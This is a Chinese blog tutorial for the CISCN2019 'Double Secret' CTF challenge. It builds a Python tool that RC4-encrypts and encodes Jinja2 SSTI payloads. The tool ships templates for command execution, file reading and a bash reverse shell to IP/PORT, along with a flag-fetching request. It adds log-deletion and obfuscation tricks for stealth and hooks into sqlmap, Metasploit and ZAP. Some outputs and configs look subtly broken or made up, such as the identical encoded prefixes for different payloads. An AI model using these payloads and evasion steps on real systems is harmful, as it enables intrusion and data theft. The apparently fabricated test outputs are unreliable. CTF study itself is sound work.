当前位置: 首页 > article >正文

手把手复现CISCN2019 Double Secret:用Python脚本自动化生成RC4加密的SSTI Payload

打造自动化SSTI攻击工具链从RC4加密到Burp Suite集成在CTF竞赛和渗透测试中效率往往决定成败。面对需要RC4加密的SSTI漏洞场景手动操作不仅耗时还容易出错。本文将带你开发一个全自动化的Python工具实现从SSTI Payload生成到Burp Suite可用的URL编码字符串的一键转换。1. 理解Double Secret赛题的技术背景2019年CISCN华东南赛区的Double Secret题目展示了一个典型的安全场景Web应用在渲染模板前对用户输入进行了RC4加密。这种设计本意是增加安全性却因为实现不当成为SSTI的入口。核心漏洞链服务端接收?secret参数当参数长度4时触发RC4解密密钥为HereIsTreasure解密后的内容直接传入render_template_string()未做任何过滤导致SSTI漏洞传统解法需要手动完成编写SSTI Payload用RC4加密Base64编码URL编码最后放入Burp Suite测试这个过程重复且容易出错特别是在调试不同Payload时。我们的工具将自动化整个流程。2. 构建自动化工具的核心组件2.1 RC4加密模块优化原始RC4实现虽然可用但我们可以进行工业级优化def rc4_crypt(key: str, data: str) - bytes: 优化的RC4加密实现 :param key: 加密密钥 :param data: 待加密数据 :return: 加密后的bytes S list(range(256)) j 0 # KSA阶段 for i in range(256): j (j S[i] ord(key[i % len(key)])) % 256 S[i], S[j] S[j], S[i] # PRGA阶段 i j 0 result [] for char in data: i (i 1) % 256 j (j S[i]) % 256 S[i], S[j] S[j], S[i] t (S[i] S[j]) % 256 result.append(ord(char) ^ S[t]) return bytes(result)改进点类型注解提升代码可读性分离KSA和PRGA阶段逻辑直接返回bytes便于后续处理移除不必要的字符串转换2.2 编码转换流水线加密后的数据处理需要三个步骤Base64编码确保二进制数据安全传输Base64解码服务端要求的处理流程URL编码适配HTTP传输from base64 import b64encode, b64decode from urllib.parse import quote def encode_pipeline(data: str) - str: # 加密 - Base64 - 解码 - URL编码 encrypted rc4_crypt(HereIsTreasure, data) b64_encoded b64encode(encrypted).decode() b64_decoded b64decode(b64_encoded).decode(latin-1) return quote(b64_decoded)注意Latin-1解码是为了处理可能的非ASCII字符这是RC4加密的常见情况3. 开发交互式命令行工具将核心功能包装成易用的CLI工具import argparse from typing import Optional def main(): parser argparse.ArgumentParser( descriptionSSTI Payload自动化处理工具, formatter_classargparse.RawDescriptionHelpFormatter, epilog示例: %(prog)s -p {{7*7}} # 简单测试 %(prog)s -i payloads.txt # 批量处理 ) group parser.add_mutually_exclusive_group(requiredTrue) group.add_argument(-p, --payload, help单个SSTI Payload) group.add_argument(-i, --input-file, help包含多个Payload的文件) parser.add_argument(-o, --output, help输出文件路径) args parser.parse_args() if args.payload: process_payload(args.payload, args.output) else: with open(args.input_file) as f: for line in f: process_payload(line.strip(), args.output) def process_payload(payload: str, output: Optional[str] None): result encode_pipeline(payload) if output: with open(output, a) as f: f.write(f{result}\n) print(fPayload: {payload[:50]}...) print(fResult: {result}\n)功能特点支持单Payload和批量处理模式结果可输出到文件或控制台清晰的帮助文档和示例进度反馈和结果预览4. 常用SSTI Payload库集成为提高效率我们可以内置常见PayloadPAYLOAD_LIBRARY { command_exec: ( {% for c in [].__class__.__base__.__subclasses__() %} {% if c.__name__catch_warnings %} {{ c.__init__.__globals__[__builtins__].eval(\__import__(os).popen(COMMAND).read()\)}} {% endif %}{% endfor %} ), file_read: ( {% for c in [].__class__.__base__.__subclasses__() %} {% if c.__name__catch_warnings %} {{ c.__init__.__globals__[__builtins__].open(FILEPATH).read() }} {% endif %}{% endfor %} ), reverse_shell: ( {% for c in [].__class__.__base__.__subclasses__() %} {% if c.__name__catch_warnings %} {{ c.__init__.__globals__[__builtins__].eval(\__import__(os).system(bash -c \\\bash -i /dev/tcp/IP/PORT 01\\\)\)}} {% endif %}{% endfor %} ) } def get_payload(payload_type: str, **kwargs) - str: 获取预定义Payload模板 :param payload_type: payload类型(command_exec|file_read|reverse_shell) :param kwargs: 模板参数(COMMAND/FILEPATH/IP/PORT等) :return: 构造好的Payload template PAYLOAD_LIBRARY.get(payload_type) if not template: raise ValueError(f未知Payload类型: {payload_type}) for key, value in kwargs.items(): template template.replace(key.upper(), str(value)) return template使用示例# 获取读取/etc/passwd的Payload payload get_payload(file_read, FILEPATH/etc/passwd)5. 与Burp Suite的工作流集成将工具输出直接用于Burp Suite手动测试流程python ssti_tool.py -p {{7*7}} | pbcopy # Mac python ssti_tool.py -p {{7*7}} | clip # Windows结果会自动复制到剪贴板直接在Burp Repeater粘贴自动化扫描配置在Burp Intruder中使用Payload ProcessingAdd - Invoke Burp extension - 选择我们的工具或者配置外部命令行工具作为Payload生成器配合Logger扩展# loggerpp_config.json { decoders: [ { name: RC4 SSTI, command: [python, /path/to/ssti_tool.py, -p, {PAYLOAD}] } ] }性能优化对比操作步骤手动操作时间工具化时间编写Payload30-60秒5秒RC4加密需另开脚本自动完成编码转换需多次操作自动流水线测试迭代容易出错一键完成批量测试几乎不可行轻松支持6. 高级功能扩展6.1 动态密钥支持通过环境变量或配置文件支持不同密钥import os def get_key() - str: return os.getenv(RC4_KEY, HereIsTreasure) # 在encode_pipeline中使用 encrypted rc4_crypt(get_key(), data)6.2 结果缓存机制避免重复计算相同Payloadfrom functools import lru_cache lru_cache(maxsize100) def cached_encode(data: str) - str: return encode_pipeline(data)6.3 交互式Shell模式import code def interactive_shell(): print(进入交互模式可用encode(payload)函数测试) vars {encode: cached_encode} code.interact(localvars)启动方式python ssti_tool.py --interactive7. 错误处理与日志记录健壮的工具需要完善的错误处理import logging from typing import Optional logging.basicConfig( levellogging.INFO, format%(asctime)s - %(levelname)s - %(message)s, handlers[ logging.FileHandler(ssti_tool.log), logging.StreamHandler() ] ) def safe_encode(data: str) - Optional[str]: try: return encode_pipeline(data) except Exception as e: logging.error(f处理Payload失败: {data[:50]}... 错误: {str(e)}) return None日志示例2023-05-15 14:30:22 - INFO - 开始处理Payload: {{7*7}} 2023-05-15 14:30:22 - ERROR - 处理Payload失败: {% invalid template... 错误: Invalid syntax8. 实际测试案例以Double Secret题目为例的完整工作流检测基础SSTIpython ssti_tool.py -p {{7*7}}输出Payload: {{7*7}} Result: .J%19S%C2%A5%15K%2B%2B文件列表探测payload get_payload(command_exec, COMMANDls /) print(encode_pipeline(payload))获取flagpayload get_payload(command_exec, COMMANDcat /flag.txt) flag_url encode_pipeline(payload) requests.get(fhttp://target/secret?secret{flag_url})9. 安全注意事项与最佳实践重要仅在合法授权测试中使用本工具速率限制import time RATE_LIMIT 0.5 # 秒 def safe_request(url): time.sleep(RATE_LIMIT) return requests.get(url)日志清理def clean_logs(): if os.path.exists(ssti_tool.log): os.remove(ssti_tool.log)Payload隐蔽性避免使用明显的关键词可以添加随机注释def obfuscate_payload(payload): return f{{# Random: {os.urandom(4).hex()} #}}{payload}10. 工具打包与分发使用setuptools创建可安装包# setup.py from setuptools import setup setup( namessti-rc4-tool, version1.0.0, py_modules[ssti_tool], install_requires[ requests2.25.1, ], entry_points{ console_scripts: [ ssti-toolssti_tool:main, ], }, )安装方式pip install -e .之后即可全局使用ssti-tool -p {{config}}11. 与其他工具的集成方案11.1 配合sqlmap# tamper脚本示例 def tamper(payload, **kwargs): from subprocess import check_output return check_output([python, ssti_tool.py, -p, payload]).decode().strip()11.2 集成到Metasploit# external/module/payload_generator.rb def generate_payload python /path/to/ssti_tool.py -p #{datastore[PAYLOAD]} end11.3 作为ZAP插件// ZAP扩展代码片段 public String processPayload(String payload) { Process p Runtime.getRuntime().exec( new String[]{python, ssti_tool.py, -p, payload}); return IOUtils.toString(p.getInputStream(), StandardCharsets.UTF_8); }12. 性能基准测试使用不同长度Payload的测试数据Payload长度处理时间(ms)输出长度10字符1.224字节100字符2.5184字节1,000字符12.81,672字节10,000字符98.416,704字节测试环境MacBook Pro M1, Python 3.9优化建议对于超长Payload可以启用多进程处理使用PyPy解释器可获得2-3倍性能提升13. 单元测试保障使用pytest编写测试用例# test_ssti_tool.py import pytest from ssti_tool import encode_pipeline pytest.mark.parametrize(payload,expected, [ ({{7*7}}, .J%19S%C2%A5%15K%2B%2B), (hello, .J%19S%C2%A5%15K%0A), ]) def test_encoding(payload, expected): assert expected in encode_pipeline(payload) def test_command_exec(): payload get_payload(command_exec, COMMANDid) result encode_pipeline(payload) assert len(result) 50运行测试pytest -v test_ssti_tool.py14. 跨平台兼容性处理确保工具在Windows/Linux/macOS上表现一致import platform def get_system_info(): return { system: platform.system(), release: platform.release(), python: platform.python_version(), } def platform_specific_encoding(data): if platform.system() Windows: return data.replace(\n, \r\n) return data15. 用户配置系统通过configparser支持用户自定义配置# config.ini [default] key HereIsTreasure rate_limit 0.5 log_file ssti.log [payloads] command_exec {{...}}读取配置import configparser config configparser.ConfigParser() config.read(config.ini) KEY config.get(default, key, fallbackHereIsTreasure)16. 版本更新与功能路线图v1.1计划功能支持AES等其他加密算法添加GUI界面集成常见WAF绕过技术增加代理支持v2.0展望机器学习自动生成有效Payload自动化漏洞检测流程与主流安全工具深度集成17. 调试技巧与问题排查常见问题解决方法编码错误症状UnicodeDecodeError解决确保使用latin-1解码RC4输出Payload无效检查服务端是否真的执行了RC4解密验证密钥是否正确性能问题对长Payload启用缓存考虑使用C扩展优化RC4算法调试模式启用python ssti_tool.py -p test --debug18. 替代方案对比方案优点缺点本工具全自动化、可定制需要Python环境手动操作无需额外工具效率低、易出错在线工具方便快捷不安全、功能有限Burp插件集成度高开发复杂、依赖Java19. 法律与道德边界再次强调仅在获得明确授权的情况下使用本工具合规使用场景CTF竞赛授权渗透测试安全教学演示禁止行为未经授权的系统测试恶意攻击违反当地法律法规的行为20. 资源推荐与延伸阅读深入学习《Web Application Security》by Andrew Hoffman《Black Hat Python》by Justin SeitzRC4算法RFC文档相关工具Tplmap自动化SSTI检测工具Burp Suite专业Web安全测试平台HackTricks安全技术大全社区资源CTFtime.orgHack The BoxVulnHub

相关文章:

手把手复现CISCN2019 Double Secret:用Python脚本自动化生成RC4加密的SSTI Payload

打造自动化SSTI攻击工具链:从RC4加密到Burp Suite集成 在CTF竞赛和渗透测试中,效率往往决定成败。面对需要RC4加密的SSTI漏洞场景,手动操作不仅耗时还容易出错。本文将带你开发一个全自动化的Python工具,实现从SSTI Payload生成到…...

编程新手必看:coze-loop代码优化器保姆级使用教程

编程新手必看:coze-loop代码优化器保姆级使用教程 1. 认识你的AI编程助手:coze-loop 对于刚开始学习编程的朋友来说,写出高效、易读且无bug的代码往往是个挑战。coze-loop正是为解决这个问题而生的AI代码优化工具,它能像一位经验…...

嵌入式诊断协议实战:从ISO15765帧解析到AUTOSAR DCM实现

1. ISO15765协议基础与车载诊断架构 第一次接触车载诊断协议时,我被各种缩写搞得头晕眼花。直到把CANoe和开发板连起来,看到真实的报文交互才恍然大悟。ISO15765本质上就是为CAN总线量身定做的诊断快递员,它负责把UDS诊断服务安全可靠地送达目…...

Spring Batch 2.2.0.M1 是 Spring Batch 项目的**里程碑版本(Milestone 1)

Spring Batch 2.2.0.M1 是 Spring Batch 项目的里程碑版本(Milestone 1),发布于 2013 年左右(具体为 2013 年 3 月),属于 Spring Batch 2.2.x 系列的首个预发布版本。该版本主要聚焦于增强批处理的可扩展性…...

终极百度网盘直连解析指南:3步告别龟速下载

终极百度网盘直连解析指南:3步告别龟速下载 【免费下载链接】baidu-wangpan-parse 获取百度网盘分享文件的下载地址 项目地址: https://gitcode.com/gh_mirrors/ba/baidu-wangpan-parse 还在为百度网盘的限速而烦恼吗?每次下载大文件都要等上几个…...

Spring Integration 2.2.1 和 2.1.5 是 Spring Integration 框架的历史版本

Spring Integration 2.2.1 和 2.1.5 是 Spring Integration 框架的历史版本,分别于 2013 年初发布(2.2.1 发布于 2013 年 2 月,2.1.5 发布于 2012 年 12 月),属于较早期的维护性补丁版本。它们主要包含: Bu…...

FRCRN模型版本管理实践:使用GitHub进行协作与迭代

FRCRN模型版本管理实践:使用GitHub进行协作与迭代 你是不是也遇到过这样的场景?团队里几个人一起开发一个AI模型的推理服务,今天张三改了点代码,明天李四更新了配置文件,结果版本乱成一锅粥,谁也不知道线上…...

Spring Web Flow 2.4 M1(里程碑版本)和 2.3.2(维护版本)于2014年左右发布

Spring Web Flow 2.4 M1(里程碑版本)和 2.3.2(维护版本)于2014年左右发布。其中:Spring Web Flow 2.4 M1 是面向 Spring Framework 4.x 的预发布版本,引入了对 Java Config 的更好支持、与 Spring Security…...

LFM2.5-1.2B-Thinking在人力资源领域的应用:智能简历分析系统

LFM2.5-1.2B-Thinking在人力资源领域的应用:智能简历分析系统 1. 引言 每天,HR部门都要面对成百上千份简历,手动筛选耗时耗力,还容易错过优秀人才。传统的关键词匹配方法往往只能看到表面的技能列表,无法深入理解候选…...

AI-比赛-天池比赛:乘用车零售量预测

本次大赛分为初赛、复赛和决赛三个阶段,其中:初赛由参赛队伍下载数据在本地进行算法设计和调试;复赛要求参赛者在线进行数据分析和处理;决赛要求参赛者进行现场演示和答辩。具体安排和要求如下: 初赛(2018…...

Wan2.2-I2V-A14B生成效果深度评测:对比YOLOv5的目标运动模拟

Wan2.2-I2V-A14B生成效果深度评测:对比YOLOv5的目标运动模拟 1. 开场:当静态图片"活"起来 想象一下这样的场景:你手头有一张普通的办公室照片,桌面上摆着咖啡杯、笔记本电脑和几本书。通过Wan2.2-I2V-A14B模型&#x…...

【Anybus】网关配置教程

Anybus X-gateway网关配置软件下载与使用: 系列:Ethernet Modbus-TCP Slave-PROFINET IO Slave 📢 操作有风险,动手需谨慎! 文章目录Anybus X-gateway网关配置软件下载与使用:一、模块用前需准备二、连接模块与电脑通…...

Youtu-VL-4B-Instruct-GGUF模型部署保姆级教程:Anaconda环境管理详解

Youtu-VL-4B-Instruct-GGUF模型部署保姆级教程:Anaconda环境管理详解 你是不是也遇到过这种情况:好不容易找到一个心仪的AI模型,照着教程一步步操作,结果不是这里报错就是那里冲突,最后环境一团糟,模型根本…...

深入理解reFlutter核心组件:引擎哈希与快照分析原理

深入理解reFlutter核心组件:引擎哈希与快照分析原理 【免费下载链接】reFlutter Flutter Reverse Engineering Framework 项目地址: https://gitcode.com/gh_mirrors/re/reFlutter reFlutter作为一款专业的Flutter逆向工程框架,其核心功能依赖于对…...

PullZoomView单元测试编写指南:确保代码质量与稳定性

PullZoomView单元测试编写指南:确保代码质量与稳定性 【免费下载链接】PullZoomView An Android custom ListView and ScrollView with pull to zoom-in. 项目地址: https://gitcode.com/gh_mirrors/pu/PullZoomView PullZoomView是一个Android自定义ListVie…...

【亲测免费】 CrealityPrint 开源项目教程

CrealityPrint 开源项目教程 【免费下载链接】CrealityPrint 项目地址: https://gitcode.com/gh_mirrors/cr/CrealityPrint 1. 项目目录结构及介绍 在克隆或下载https://github.com/CrealityOfficial/CrealityPrint.git后的项目中,您将看到以下主要目录结构…...

Malloy 渲染系统深度解析:如何创建交互式数据可视化

Malloy 渲染系统深度解析:如何创建交互式数据可视化 【免费下载链接】malloy Malloy is a modern open source language for describing data relationships and transformations. 项目地址: https://gitcode.com/gh_mirrors/ma/malloy Malloy 是一款现代开源…...

ClearerVoice-Studio在直播场景中的实时降噪方案

ClearerVoice-Studio在直播场景中的实时降噪方案 1. 直播场景的音频挑战 直播时最头疼的就是背景噪音问题。想象一下,你正在认真讲解产品,突然窗外传来施工声,或者家里空调嗡嗡作响,观众听得难受,你自己也尴尬。这种…...

AI读脸术入门教程:零代码实现人脸属性识别(附案例)

AI读脸术入门教程:零代码实现人脸属性识别(附案例) 1. 引言:认识AI读脸术 1.1 什么是人脸属性识别 想象一下,你拍了一张自拍照上传到社交平台,系统自动识别出你的性别和年龄段——这就是人脸属性识别技术…...

nli-distilroberta-base作品展示:NLI服务嵌入低代码平台后的无代码逻辑校验界面

nli-distilroberta-base作品展示:NLI服务嵌入低代码平台后的无代码逻辑校验界面 1. 项目概述 nli-distilroberta-base是一个基于DistilRoBERTa模型的自然语言推理(NLI)Web服务,专门用于判断两个句子之间的逻辑关系。这项技术通过深度学习模型自动分析文…...

千问3.5-2B惊艳效果:CAD图纸局部→尺寸标注识别+公差解析+材料属性提取

千问3.5-2B惊艳效果:CAD图纸局部→尺寸标注识别公差解析材料属性提取 1. 专业级CAD图纸解析能力展示 千问3.5-2B作为Qwen系列的小型视觉语言模型,在工程图纸解析方面展现出令人惊艳的专业能力。不同于普通OCR工具,它能真正理解CAD图纸的技术…...

5分钟掌握XUnity.AutoTranslator:为Unity游戏开启实时翻译的终极指南

5分钟掌握XUnity.AutoTranslator:为Unity游戏开启实时翻译的终极指南 【免费下载链接】XUnity.AutoTranslator 项目地址: https://gitcode.com/gh_mirrors/xu/XUnity.AutoTranslator 你是否曾因语言障碍而错过优秀的Unity游戏?面对日文、英文或其…...

uBlock-Origin-dev-filter数据清理原理:DNS检测与SEO垃圾网站识别

uBlock-Origin-dev-filter数据清理原理:DNS检测与SEO垃圾网站识别 【免费下载链接】uBlock-Origin-dev-filter Filters to block and remove copycat-websites from DuckDuckGo, Google and other search engines. Specific to dev websites like StackOverflow or …...

探索Android Vision API:从入门到实战的完整指南

探索Android Vision API:从入门到实战的完整指南 【免费下载链接】android-vision Deprecated: The Mobile Vision API is now a part of ML Kit: Check out this repo: 项目地址: https://gitcode.com/gh_mirrors/an/android-vision Android Vision API是一…...

RexUniNLU在客户服务工单自动分类中的实战应用

RexUniNLU在客户服务工单自动分类中的实战应用 客户服务工单处理效率直接影响用户体验和企业运营成本,传统人工分类方式面临效率低、准确率不稳定等痛点 在现代客户服务体系中,工单处理是第一道也是最重要的环节之一。每天,客服团队需要处理大…...

ta4j数据源集成实战:从Yahoo Finance到Coinbase的完整解决方案

ta4j数据源集成实战:从Yahoo Finance到Coinbase的完整解决方案 【免费下载链接】ta4j A Java library for technical analysis. 项目地址: https://gitcode.com/gh_mirrors/ta/ta4j ta4j是一个强大的Java技术分析库,提供了从多种金融数据源获取市…...

造相-Z-Image参数详解:Z-Image原生支持的长提示词截断策略与语义保持机制

造相-Z-Image参数详解:Z-Image原生支持的长提示词截断策略与语义保持机制 想让AI画出你脑海中的画面,最头疼的往往不是模型不够强,而是你精心构思的一大段描述,到了AI那里却“听”不全。你写了几百字,从人物神态到环境…...

题解:洛谷 AT_abc391_a [ABC391A] Lucky Direction

本文分享的必刷题目是从蓝桥云课、洛谷、AcWing等知名刷题平台精心挑选而来,并结合各平台提供的算法标签和难度等级进行了系统分类。题目涵盖了从基础到进阶的多种算法和数据结构,旨在为不同阶段的编程学习者提供一条清晰、平稳的学习提升路径。 欢迎大家订阅我的专栏:算法…...

题解:洛谷 AT_abc391_b [ABC391B] Seek Grid

本文分享的必刷题目是从蓝桥云课、洛谷、AcWing等知名刷题平台精心挑选而来,并结合各平台提供的算法标签和难度等级进行了系统分类。题目涵盖了从基础到进阶的多种算法和数据结构,旨在为不同阶段的编程学习者提供一条清晰、平稳的学习提升路径。 欢迎大家订阅我的专栏:算法…...

UI-TARS-desktop实现VLOOKUP跨表匹配:Excel自动化处理新方案

UI-TARS-desktop实现VLOOKUP跨表匹配:Excel自动化处理新方案 你是不是也经常被Excel里的跨表匹配搞得头大?手里有两张表,一张是客户名单,一张是订单记录,想把订单金额匹配到对应的客户名下。手动操作吧,得…...